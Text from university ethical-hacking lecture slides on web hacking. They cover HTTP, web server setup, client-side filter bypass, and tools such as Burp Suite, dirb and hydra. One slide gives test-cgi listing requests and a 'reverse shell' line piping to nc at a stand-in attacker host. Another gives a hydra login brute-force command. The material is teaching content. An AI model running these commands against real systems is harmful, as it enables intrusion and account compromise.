IN5290 Ethical Hacking

Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing

Universitetet i OsloLaszlo Erdödi

IN5290 2018 L05 – Web hacking 1. 2

Lecture Overview

• Summary - how web sites work• HTTP protocol• Client side – server side actions• Accessing hidden contents• Modifying client side data• Brute-forcing forms, directories• Web parameter tampering

IN5290 2018 L05 – Web hacking 1. 3

Hypertext Transfer Protocol (HTTP)

HTTP is the protocol forweb communication.Currently version 1.0, 1.1and 2.0 are in use (2.0exits since 2015, almostall browsers support it bynow). HTTP is used in aclient – server model. Theclient sends a requestand receives answer fromthe server.

Client Server

Request

Request

Response

Response

IN5290 2018 L05 – Web hacking 1. 4

Hypertext Transfer Protocol (HTTP)

Each request and response consist of a header and abody. The header contains all the necessary and additionalinformation for the HTTP protocol.Request:• The protocol version• The requested file• The webmethod (see later)• The host nameResponse:• The web answer (in response)• The date• The content type

ClientRequest header

Request body

Response header

Response body

Server

IN5290 2018 L05 – Web hacking 1. 5

HTTP response splittingHTTP response splitting is anold vulnerability (still appearsin 2018). In case ofinappropriate validation of therequests, the client canprovide misleading input (twonew lines in the headerindicates the end of theheader). The attacker canforce the server to cache awrong server answer.

Request headerFake bodyFake header

Request body

Response header

Response body

Response header

Response body

IN5290 2018 L05 – Web hacking 1. 6

Hypertext Transfer Protocol (HTTP)

HTTP operates with several web methods. The main methods in use:• GET - to download data• POST - to send data (e.g. I posted something on facebook )Other methods in use:• HEAD – to obtain the HTTP header• PUT – to place content on the server (e.g. restful services)Further existing methods:DELETE (to remove content), TRACE, DEBUG, OPTIONS (to see the available webmethod list)

IN5290 2018 L05 – Web hacking 1. 7

Hypertext Transfer Protocol – telnet

IN5290 2018 L05 – Web hacking 1. 8

Hypertext Transfer Protocol with browserThe web communication is basically done by the web browsers. Thebrowsers can send optional values, such as content encoding, browsertype, etc.

IN5290 2018 L05 – Web hacking 1. 9

Hypertext Transfer Protocol web answers (Http status codes)

2xx: Success200: OK204: No content

3xx: Redirection301: Moved permanently302: Moved temporarily304: Not modified305: Use proxy308: Permanent redirect

4xx: Client error400: Bad request403: Forbidden404: File not found405: Method not allowed408: Request timeout

5xx: Server error500: Internal server error502: Bad gateway504: Gateway timeout505: Http version not supported

IN5290 2018 L05 – Web hacking 1. 10

HTTP PUT method – upload file

PUT method wasused to place andupdate websitecontent before ftp. Ifit is enabled for afolder and the folderhas permission towrite then theattacker can takeadvantage of thatvulnerability andupload arbitrary file.

IN5290 2018 L05 – Web hacking 1. 11

Accessing a webpageClient side Server side

Operating system

Browser

Html processingJavascript executionFlash execution

Operating system

Web server app FTP Otherservices

Server sideScripting engine

CMS

HTTP request

HTTP response

DB request

DB response

IN5290 2018 L05 – Web hacking 1. 12

Webserver types and configuration

Web server types and applications:• Apache• Internet Information Service (IIS, Microsoft)• Nginx• Lighttpd• GWS (Google)• othersThe web server is an application that is running under an OS. The userthat runs the web server should have the least privileges. Never run aweb server as a root! The webserver user has access to its own folder(webroot, e.g. /var/www, c:/inetpub, etc.) and the logging directory.

IN5290 2018 L05 – Web hacking 1. 13

Webserver configuration

The webserver configurationfile contains almost all theserver settings. The serverside script settings (e.g.where’s the php binary), theindex file extensions (inwhich order should thedefault page be considered,e.g: 1.index.php,2.index.htm), default errormessages (404 File notfound page) have to beplaced inside the conf file.

apache2.conf example

IN5290 2018 L05 – Web hacking 1. 14

Webserver configuration (.htaccess)

An .htaccess file is a way to configure the details of yourwebsite without altering the server config files.Main functions:• Mod_Rewrite (is a very powerful and sophisticated module which

provides a way to do URL manipulations)• Authentication (require a password to access certain sections of the

webpage)• Custom error pages (e.g. for 400 Bad request, 404 File not found,

500 Internal Server Error)• Mime types (add extra application files, e.g. special audio)• Server Side Includes (for update common scripts of web pages)

IN5290 2018 L05 – Web hacking 1. 15

Client side – How the browser process the htmlWhen the browser downloads the html file it is processed.The html can contain additional files:• Pictures (usually: png, jpg, gif)• Stylesheets (xss)• Javascript codes• Flash objects (swf)

All additional content have an access address (local orglobal). During the processing all the additional content willbe retrieved from the server with a separate web request.

IN5290 2018 L05 – Web hacking 1. 16

Tamper Data – Firefox addon

Tamper Data is a Firefox addon that is able to show all packetscrossing the browser with their details.

The main function is to view and modify the http/https header andPOST data. Unfortunately Firefox Quantum does not support it, butthere are other alternatives.

IN5290 2018 L05 – Web hacking 1. 17

Client side – How the browser process the htmlThe uio.no’s index.html contains several pictures,stylesheets and javascript code. The browser downloads allstep by step.

IN5290 2018 L05 – Web hacking 1. 18

Client side code

Html example from uio.no:

Style sheets example from uio.no:

Reference to a picture

Javascript inserted

Reference to javascript

IN5290 2018 L05 – Web hacking 1. 19

Javascript

Alongside HTML and CSS, JavaScript is one of the three coretechnologies of the World Wide Web. JavaScript enablesinteractive web pages and thus is an essential part of webapplications. The vast majority of websites use it, and all major webbrowsers have a dedicated JavaScript engine to execute it. As a multi-paradigm language, JavaScript supports event-driven, functional,and imperative (including object-oriented and prototype-based) programming styles. It has an API for working with text, arrays,dates, regular expressions, and basic manipulation of the DOM, butthe language itself does not include any I/O, such as networking,storage, or graphics facilities, relying for these upon the hostenvironment in which it is embedded.Example:<script>alert(‘Hi! I’m the Javascript Engine!’);</script>

IN5290 2018 L05 – Web hacking 1. 20

Flash

Flash is a platform for viewing multimedia contents, executing richInternet applications, and streaming audio and video. It can beembedded to web sites.Swf source example:

Flash code example:

Embedding flash object:

IN5290 2018 L05 – Web hacking 1. 21

Server side scripts

Server side scripts are executed on the server side. Manylanguages exist: php, perl, ruby, java, asp, etc. After theexecution a static html is generated and that is sent to theclient.

Php examples (php to html):<?php Print(‘<h1>Hello John!</h1>’); ?> -> <h1>Hello John!</h1>

<?php $result = mysql_query(“Select name from users where id=115”);$name = mysql_fetch_array($result);Print(‘<h1>Hello ‘.$name.’!</h1>’); ?> -> <h1>Hello John!</h1>

IN5290 2018 L05 – Web hacking 1. 22

Content Management Systems (CMS)

CMS are designed to create and modify the content of Webpages easily. The feature of CMS includes Web-basedpublishing, format management, history editing and versioncontrol, indexing, search, and retrieval. Typical CMS:• Joomla• Drupal• WordPressIf a vulnerability of CMS appears millions of websites canbe vulnerable suddenly.

IN5290 2018 L05 – Web hacking 1. 23

Start compromising a website

• First use it in a normal way (find the linked subsites,contents, input fields)

• Decide whether it is a simple static site or it has complexdynamic content (server side scripts, database behind)

• Try to find not intended content (comments in sourcecode

• Try to find hidden content without link (factory defaultfolders, user folders, configuration files)

• Try to obtain as much info as it is possible (informationdisclosures)

• Force the site to error (invalid inputs) and see the result

IN5290 2018 L05 – Web hacking 1. 24

Information disclosure

Example1: Find the hidden information (flag) on the following site: http://193.225.218.118/ctf/flag1

Example2: Find the hidden information (flag) on the following site: http://193.225.218.118/cybersmart/info2

IN5290 2018 L05 – Web hacking 1. 25

Prohibited content for search engines -robots.txtRobots.txt is a file that has to be placed in the webroot folder.Search engine robots read the file and process all thedisallowed entities. On the other hand it is an informationdisclosure. It also means that the listed entities exist.

IN5290 2018 L05 – Web hacking 1. 26

Dangerous default scripts: e.g. cgi-bin/test-cgiCgi-bin is a protocol to execute programs through apacheweb server. Test-cgi is a default file. The current directorycontent can be listed with it:GET /cgi-bin/test-cgi?*The root directory:GET /cgi-bin/test-cgi?/*Execute command with pipe (reverse shell):"GET /cgi-bin/test-cgi?/*" | nc attacker.com 80

IN5290 2018 L05 – Web hacking 1. 27

Directory brute-force / dirb

Different web servers use different default folders anddefault files. Dirb has collections of typical webserverrelated folder names.

IN5290 2018 L05 – Web hacking 1. 28

Directory brute-force / dirb

Dirb also has unified dictionaries (big.txt, common.txt, etc.

Dirb brute-forces the folders and files using the dictionaries.Example: Use dirb to find hidden content onhttp://193.225.218.118

IN5290 2018 L05 – Web hacking 1. 29

Client side filtering

Input filtering can be done on the client side. Client sideinput filtering is not input validation! Any data on the clientside can be modified (it’s my browser I can decide whatdata will be sent out). Typical input filtering:• Form elements with restrictions (max length of input,

restriction for special characters, only special characters are allowed, predefined input option e.g. radiobutton, combo)

• Javascript filtering (the javascript is running on client side, more complex validation can be done)

Client side filtering can be bypassed easily, that practically means no additional security

IN5290 2018 L05 – Web hacking 1. 30

Web developer extension

Web developer extension provides several features tomodify the client side appearance. It can modify the formelements, disable javascript, remove validations, etc.

Example: Find the flag on that site: http://193.225.218.118/ctf/flag4Use the web developer extension!

IN5290 2018 L05 – Web hacking 1. 31

Tamper data – modifying outgoing traffic

Tamper data is also for modifying the outgoing traffic. Byclicking on the start tamper button we can intercept thetraffic and modify the outgoing requests.

IN5290 2018 L05 – Web hacking 1. 32

Chrome postman

Postman interceptorcan set customheaders (includingcookies) and viewcookies already seton the domain.

IN5290 2018 L05 – Web hacking 1. 33

Burpsuite

Burp Suite is a tool for testing Web application security.It provides a proxyserver, and severalfeatures to smart-alterthe web traffic. Forexample every packetcan be resent by therepeater module andedited before at bytelevel. Any client sidevalidation can bebypassed with Burp.

IN5290 2018 L05 – Web hacking 1. 34

Brute force with hydra

Hydra can be used for http brute-forcing as well. Similarlyto the previously discussed protocols the username(username file) and the password (password file) have tobe provided. Contrary to the previous cases Hydra needs akeyword to identify negative answers (reverse brute-force).Example:hydra -l username -P passwordfile url.to.bf http-post-form"/portal/xlogin/:ed=^USER^&pw=^PASS^:F=Invalid"

Practice example: Find valid usernames for the form here:http://193.225.218.118/hydra.php

End of lecture

INF5290 2018 35L05 – Web hacking 1.